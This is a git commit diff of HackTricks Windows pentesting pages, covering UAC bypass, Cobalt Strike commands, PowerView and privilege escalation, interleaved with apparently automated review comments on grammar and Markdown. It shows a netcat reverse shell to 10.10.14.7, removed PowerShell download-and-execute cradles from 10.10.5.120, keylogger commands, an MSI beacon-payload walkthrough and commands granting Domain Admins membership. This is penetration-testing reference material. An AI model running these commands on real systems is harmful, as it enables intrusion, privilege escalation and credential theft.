GitBook: [#3368] No subject

This commit is contained in:
CPol 2022-08-13 12:32:53 +00:00 committed by gitbook-bot
parent f1a0bdb8ae
commit 27a38dacf5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
6 changed files with 73 additions and 111 deletions

View file

@ -40,7 +40,6 @@ If you already has the file you want to host in a web sever just go to `Attacks
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
@ -50,4 +49,7 @@ screenwatch # Take periodic screenshots of desktop
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
```
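Review bot: the added `powershell-import C:\path\to\PowerView.ps1` line is the only entry in this block without a `#` comment, whereas `execute-assembly`, `screenshot` and `keylogger` each carry one on the same line or the line above; suggest `powershell-import C:\path\to\PowerView.ps1 # load a local .ps1 so its functions are available to later powershell commands`.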

View file

@ -1,4 +1,4 @@
# Authentication, Credentials, UAC and EFS
<details>
@ -16,13 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Security Support Provider Interface (SSPI)
# Security Support Provider Interface (SSPI)
Is the API that can be use to authenticate users.
The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
### Main SSPs
## Main SSPs
* **Kerberos**: The preferred one
* %windir%\Windows\System32\kerberos.dll
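Review bot: the context line `Is the API that can be use to authenticate users.` directly under the renamed `# Security Support Provider Interface (SSPI)` header has no subject and a verb error; since the header is being edited anyway, fix it to `SSPI is the API used to authenticate users.` The following sentence is also a run-on: `these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same` would read better as `These protocols are called Security Support Providers (SSPs); each is a DLL on the Windows machine, and both machines must support the same SSP to communicate.`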
@ -35,27 +36,27 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
* %windir%\Windows\System32\lsasrv.dll
#### The negotiation could offer several methods or only one.
### The negotiation could offer several methods or only one.
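Review bot: `### The negotiation could offer several methods or only one.` is a full sentence used as a heading (before and after the level change); it should be a normal paragraph under `## Main SSPs`, or a short heading such as `### Negotiation` with that sentence as its body.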
## Local Security Authority (LSA)
# Local Security Authority (LSA)
The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
The **credentials** are **saved** inside the **process \_LSASS**\_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
The **credentials** are **saved** inside the **process **_**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
## Credentials Storage
# Credentials Storage
### Security Accounts Manager (SAM)
## Security Accounts Manager (SAM)
Local credentials are present in this file, the passwords are hashed.
### LSASS
## LSASS
We have talk about this. Different credentials are saved in the memory of this process.
### LSA secrets
## LSA secrets
LSA could save in disk some credentials:
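Review bot: two context sentences in this hunk need grammar fixes while the headings are being relevelled: `We have talk about this.` should read `We have already talked about this.`, and `Local credentials are present in this file, the passwords are hashed.` is a comma splice (`...in this file; the passwords are hashed.`). The LSASS markup fix (`**process **_**LSASS**_`) is fine, but `easily decrypted passwords` is vague; say which credential types are meant.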
@ -64,15 +65,15 @@ LSA could save in disk some credentials:
* Passwords for scheduled tasks
* More (password of IIS applications...)
### NTDS.dit
## NTDS.dit
It is the database of the Active Directory. It is only present in Domain Controllers.
### Credential Manager store
## Credential Manager store
Allows browsers and other Windows applications to save credentials.
## UAC
# UAC
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
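Review bot: `This is **achieved using default** the **low privileged token** of the user` in the UAC paragraph has its words out of order; suggest `This is achieved by using the user's low-privileged token by default`. Also drop the comma in `When, the administrator executes`.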
@ -88,7 +89,7 @@ Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to hi
You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
### Check UAC
## Check UAC
First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
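Review bot: `if its **`0`**` on the EnableLUA line should be `if it's`; and `**activated**` / `**inactive**` read better as `enabled` / `disabled`, matching what `EnableLUA` controls.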
@ -96,7 +97,7 @@ First you need to check the value of the key **EnableLUA**, if it's **`1`** then
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
```
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
* If **`0`** then, UAC won't prompt (like **disabled**)
* If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
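Review bot: the new version of the ConsentPromptBehaviorAdmin line drops the space after the closing `**`, producing `**`ConsentPromptBehaviorAdmin`**in the same entry`, which renders as one run-together word and can break the bold span; keep the space: `**`ConsentPromptBehaviorAdmin`** in the same entry`.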
@ -105,20 +106,20 @@ Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in
* If **`4`** like `2` but not necessary on Secure Desktop
* if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`** \
If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
And, finally take a look at the value of the key **`FilterAdministratorToken`**\
If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
#### Summary
### Summary
* If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
* If **`EnableLUA=0`**or **doesn't exist**, **no UAC for anyone**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=1`, UAC for everyone**
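Review bot: the rewritten summary bullets use `** `EnableLua=1` **` with spaces inside the bold markers; CommonMark does not treat `**` followed by whitespace as an emphasis opener, so these render as literal asterisks. `**`EnableLUA=0`**or` has also lost its space. Suggest `* If **`EnableLUA=0`** or **doesn't exist**, **no UAC for anyone**` and `* If **`EnableLUA=1`** and **`LocalAccountTokenFilterPolicy=1`**, no UAC for anyone`, using one spelling throughout (the registry value is `EnableLUA`).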
### UAC bypass
## UAC bypass
{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
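Review bot: the hint text has `UAS prompt` (should be `UAC prompt`) and `straight forward` (`straightforward`).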
@ -136,11 +137,11 @@ net user %username%
whoami /groups | findstr Level
```
#### **Very** Basic UAC "bypass" (full file system access)
### **Very** Basic UAC "bypass" (full file system access)
If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
{% hint style="warning" %}
{% hint style="info" %}
**Looks like this trick isn't working anymore**
{% endhint %}
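Review bot: changing the hint from `warning` to `info` weakens a notice whose whole content is that the technique no longer works; `warning` is the more fitting style. The preceding sentence is also hard to parse: `mount the C$ shared via SMB (file system) local in a new disk` could be `mount the C$ share over SMB as a new local drive`.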
@ -152,9 +153,9 @@ cd C$
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
#### UAC disabled
### UAC disabled
If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
If UAC is already disabled (**`ConsentPromptBehaviorAdmin`**is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
```bash
#Put your reverse shell instead of "calc.exe"
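Review bot: the new `UAC disabled` line loses the space after the bold span (`**`ConsentPromptBehaviorAdmin`**is **`0`**`), which renders as one word and can break the emphasis; keep `**`ConsentPromptBehaviorAdmin`** is **`0`**`.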
@ -162,35 +163,14 @@ Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
#### UAC bypass with token duplication
### UAC bypass exploits
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
#### UAC bypass with cobalt strike
The Cobalt Strike techniques will only work if UAC is not set at it's max security level
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
#### UAC bypass exploits
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like\_Source\Akagi\outout\x64\Debug\Akagi.exe\_) , you will need to know **which one you need.**\
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
#### More UAC bypass
### More UAC bypass
**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
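Review bot: renaming `#### UAC bypass with token duplication` to `### UAC bypass exploits` and deleting the old `#### UAC bypass exploits` heading merges the two token-duplication links with the UACME paragraph under one heading, and the transition `You could also use some tools` no longer has anything it refers back to; keep a one-line introduction for the links or a separate sub-heading. The removed Cobalt Strike block also took the caveat `will only work if UAC is not set at it's max security level` with it; if those commands moved to the Cobalt Strike page, the caveat should travel with them. Minor: `bypass AUC` should be `bypass UAC`, `outout` in the Akagi path looks like a typo for `output`, and `it's max` should be `its max`.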
@ -200,7 +180,7 @@ You can get using a **meterpreter** session. Migrate to a **process** that has t
(_explorer.exe_ should works)
### Your own bypass - Basic UAC bypass methodology
## Your own bypass - Basic UAC bypass methodology
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
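Review bot: in the renamed methodology section, `If you take a look to **UACME**` should be `at`, `vulnerabilit**y` closes the bold one character early (`**Dll Hijacking vulnerability**`), and the context line `(_explorer.exe_ should works)` should read `should work`.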
@ -211,13 +191,13 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
2. **IFileOperation**: Windows 10.
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
#### Another UAC bypass technique
### Another UAC bypass technique
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
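Review bot: `Consists on watching if` should be `Consists of checking whether`, and the sentence has no subject; `This technique consists of checking whether an **autoElevated binary** reads...` reads better. The numbered list above jumps from `2.` to `4.`; verify that no step was dropped.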
## EFS (Encrypted File System)
# EFS (Encrypted File System)
EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
Examples of files being decrypted without the user asking for it:
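Review bot: the two EFS lines shown for this hunk are identical as rendered, so the change is presumably whitespace-only; worth confirming nothing else was intended. While here, `$EFS **alternative data stream**` should be `alternate data stream`, which is the NTFS term.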
@ -226,23 +206,25 @@ Examples of files being decrypted without the user asking for it:
The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
### Check EFS info
## Check EFS info
Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Check **who** has **access** to the file using cipher /c \<file>\
You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
### Decrypting EFS files
## Decrypting EFS files
#### Being Authority System
### Being Authority System
This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
#### Knowing the users password
### Knowing the users password
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
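Review bot: the context lines in this hunk carry typos that the re-levelling should pick up: `tansparently access by` should be `transparently accessed by`, `logins as him` should be `logging in as him`, `using a `meterpreter` sessions` should be `session`, and `Check if a **user** has **used** this **service** checking if this path exists:` should be `by checking whether this path exists:` with a space before the backtick.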
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -258,3 +240,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -441,9 +441,6 @@ xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
### Listen address ACLs

View file

@ -244,12 +244,6 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
## Get permissions
```bash
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```
## OS version and HotFixes
```bash

View file

@ -1,4 +1,4 @@
# PowerView
<details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
## Quick enumeration
### Quick enumeration
```bash
Get-NetDomain #Basic domain info
@ -52,10 +51,11 @@ Invoke-UserHunter -CheckAccess
Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
```
## Domain info
### Domain info
```bash
# Domain Info
Get-Domain #Get info about the current domain
Get-NetDomain #Get info about the current domain
Get-NetDomain -Domain mydomain.local
Get-DomainSID #Get domain SID
@ -64,13 +64,19 @@ Get-DomainSID #Get domain SID
Get-DomainPolicy #Get info about the policy
(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
(Get-DomainPolicy)."SystemAccess" #Password policy
Get-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous
(Get-DomainPolicy).PrivilegeRights #Check your privileges
Get-DomainPolicyData # Same as Get-DomainPolicy
# Domain Controller
Get-NetDomainController -Domain mydomain.local #Get Domain Controller
Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller
Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain Domain Controller
# Get Forest info
Get-ForestDomain
```
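Review bot: `Get-NetDomainController -Domain mydomain.local` now appears twice in the block with different comments (`#Get Domain Controller` and `#Get all ifo of specific domain Domain Controller`); keep one and fix `ifo` to `info`. `Get-DomainPolicyData` is likewise listed twice (`#Same as previous` and `# Same as Get-DomainPolicy`); one line with a single comment is enough.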
## Users, Groups and Computers
### Users, Groups and Computers
```bash
# Users
@ -118,7 +124,7 @@ Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
```
## Logon and Sessions
### Logon and Sessions
```bash
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
@ -128,7 +134,7 @@ Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admi
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
```
## Shared files and folders
### Shared files and folders
```bash
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
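Review bot: `Lot of users use to be logged in this kind of servers` in the shared-files block should read `Many users are usually logged into these servers`.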
@ -136,7 +142,7 @@ Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters
```
## GPOs & OUs
### GPOs & OUs
```bash
#GPO
@ -153,7 +159,7 @@ Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
```
## ACL
### ACL
```bash
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs #Get ACLs of an object (permissions of other objects over the indicated one)
@ -163,13 +169,14 @@ Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUser
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights #Get special rights over All administrators in domain
```
## Domain Trust
### Domain Trust
```bash
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
Get-DomainTrustMapping #Enumerate also all the trusts
Get-ForestDomain # Get basic forest info
Get-ForestGlobalCatalog #Get info of current forest (no external)
Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
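Review bot: `Get-ForestDomain # Get basic forest info` is added here and also in the `Domain info` block (`# Get Forest info`); one location is enough, or cross-reference the other. `Get-ForestGlobalCatalog #Get info of current forest (no external)` would be clearer as `#Get global catalog servers of the current forest`.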
@ -180,7 +187,7 @@ Get-DomainForeingUser #Get users with privileges in other domains inside the for
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
```
## L**ow**-**hanging fruit**
### L**ow**-**hanging fruit**
```bash
#Check if any user passwords are set
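Review bot: the renamed heading keeps the broken emphasis `L**ow**-**hanging fruit**`, which renders bold inside the word; it should be `### Low-hanging fruit`.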
@ -205,7 +212,7 @@ Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
```
## Deleted objects
### Deleted objects
```bash
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
@ -213,21 +220,21 @@ Invoke-UserHunter -Stealth
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
## MISC
### MISC
### SID to Name
#### SID to Name
```bash
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
### Kerberoast
#### Kerberoast
```bash
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
### Use different credentials \(argument\)
#### Use different credentials (argument)
```bash
# use an alterate creadential for any function
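Review bot: `# use an alterate creadential for any function` has two typos: `alternate credential`.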
@ -236,7 +243,7 @@ $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $S
Get-DomainUser -Credential $Cred
```
### Impersonate a user
#### Impersonate a user
```bash
# if running in -sta mode, impersonate another credential a la "runas /netonly"
@ -247,7 +254,7 @@ Invoke-UserImpersonation -Credential $Cred
Invoke-RevertToSelf
```
### Set values
#### Set values
```bash
# set the specified property for the given user identity
@ -260,10 +267,6 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -279,5 +282,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -214,9 +214,9 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith
## KrbRelayUp
This is essentially a universal no-fix **local privilege escalation** in windows **domain** environments where **LDAP signing is not enforced,** where the **user has self rights** (to configure **RBCD**) and where the **user can create computers in the domain.**\
****All the **requirements** are satisfied with **default settings**.
\*\*\*\*All the requirements \*\*\*\* are satisfied with **default settings**.
Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)\*\*\*\*
Even if the attack is For more information about the flow of the attack check [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/)
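Review bot: the new lines contain escaped markers `\*\*\*\*All the requirements \*\*\*\*` and a trailing `\*\*\*\*` after the KrbRelayUp link, which render as literal asterisks; they are leftovers of empty bold spans and should be removed. The context line `Even if the attack is For more information about the flow of the attack check ...` is a broken sentence (`Even if the attack is` has no continuation); either complete it or drop the fragment.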
@ -262,21 +262,6 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t
[create-msi-with-wix.md](create-msi-with-wix.md)
{% endcontent-ref %}
### Create MSI with Visual Studio
* **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe`
* Open **Visual Studio**, select **Create a new project** and type "installer" into the search box. Select the **Setup Wizard** project and click **Next**.
* Give the project a name, like **AlwaysPrivesc**, use **`C:\privesc`** for the location, select **place solution and project in the same directory**, and click **Create**.
* Keep clicking **Next** until you get to step 3 of 4 (choose files to include). Click **Add** and select the Beacon payload you just generated. Then click **Finish**.
* Highlight the **AlwaysPrivesc** project in the **Solution Explorer** and in the **Properties**, change **TargetPlatform** from **x86** to **x64**.
* There are other properties you can change, such as the **Author** and **Manufacturer** which can make the installed app look more legitimate.
* Right-click the project and select **View > Custom Actions**.
* Right-click **Install** and select **Add Custom Action**.
* Double-click on **Application Folder**, select your **beacon.exe** file and click **OK**. This will ensure that the beacon payload is executed as soon as the installer is run.
* Under the **Custom Action Properties**, change **Run64Bit** to **True**.
* Finally, **build it**.
* If the warning `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` is shown, make sure you set the platform to x64.
### MSI Installation
To execute the **installation** of the malicious `.msi` file in **background:**
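Review bot: deleting the `### Create MSI with Visual Studio` walkthrough (including the `File 'beacon-tcp.exe' targeting 'x64'` troubleshooting note) leaves only the WiX content-ref before `### MSI Installation`; if the section was moved, add a content-ref to its new page, since the hunk gives no pointer. Minor: `this tools` in the context line should be `these tools`.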
@ -1496,7 +1481,6 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\
****[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\
[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.
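Review bot: the SharpUP line keeps a leading `****` (an empty bold span) and the Beroot line has `**\~\~**\~\~` (escaped strikethrough leftovers) before `--`; both render as literal characters and should be removed. `lots of softwares` should be `lots of software`, and on the LaZagne line the description is wrapped in bold unlike the neighbouring entries.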